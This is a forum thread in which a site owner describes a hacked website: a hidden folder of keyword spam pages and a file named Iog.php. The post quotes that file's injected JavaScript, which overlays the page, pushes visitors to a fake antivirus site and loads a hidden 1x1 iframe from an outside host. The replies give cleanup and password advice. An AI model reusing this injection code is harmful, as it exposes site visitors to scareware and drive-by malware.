I wouldn't have noticed that my site was hacked if Google didn't sent me an email letting me know that he found some hidden keywords in my pages and it breaks their rules and some pages were taken of the index. I took a look at my FTP and in that particular domain indeed there were some extra files like this: 1. a folder named .xdata which contained at least 300 html files with weird names like: 790-sports-animal.com.html; 2010-heisman-odds.html; agua-bella.html and so on. These html files contained urls and keywords 2. a file named Iog.php which contained the following code: document.write('<div style="position: absolute; top: 0; left: 0; width: 100%; height: 4000px; background-color: #FFFFFF; padding: 0px">'); function go() { window.open("http://antyvirusservicenow.com/hitin.php?land=20&affid=34100"); } document.write('<center><table align=center cellpadding=0 cellspacing=0 style="border: 0px solid; border-color: #000000; width: 400px; height: 300px; padding: 30px; margin-top: 100px; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: #000000;"><tr><td><br><br><br><br><br><br><br><br><br><br><center><input type=submit name=klik id=klik value="-=ENTER=-" onclick="go();" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 40px; color: red; font-weight: bold; width: 300px; height: 60px; border: 2px solid; cursor: pointer"></center></td></tr></table></center></font></div><iframe src="http://levitt-tupa-wkolota.freehostia.com/k.html" width="1" height="1"></iframe>'); PHP: 3. a logs file which again has a lot of links and keywords I deleted these 2 files and folder but they are created every time. I also changed the .xdata folder permissions to 444 but it still changes itself to 777. I couldn't find those keywords hidden in my pages at all. Anyone has any clue? Thanks
Im think that somebody have FTP access to your site. 1. Change your FTP password. 2. Scan your PC with antivirus. (SuperAntySpyware, Malwarebytes) Are you using shared hosting? Which rights have your user account and can you compare .xdata ownership with ownership of folders that you make your self?
my best advice would be be delete and reinstall from your backup. Periodically change your FTP password and use something like "HiN1!^ba["
Well, using a previous version is not sure that you will solve the problem. If your website is vulnerable to hacker attacks, you will have to need the help of some security-geeks. Few months ago, I read about the ptrace security solutions... if I remember correctly, they are free for small and no-profit websites. gigatain
yeah, use password generators for long and unique strong passwords to be safe. And as others said, keep changing your password on intervals. Make a note of it on your phone or stick it to to do list or something.
i had the same thing happen once. a trojan gets a hold of your pc, steals your FTP logins and then adds malicious code to your site pages. scan pc with AVG and Malwarebytes then FTP into site and remove malicious code. helps to have backups ...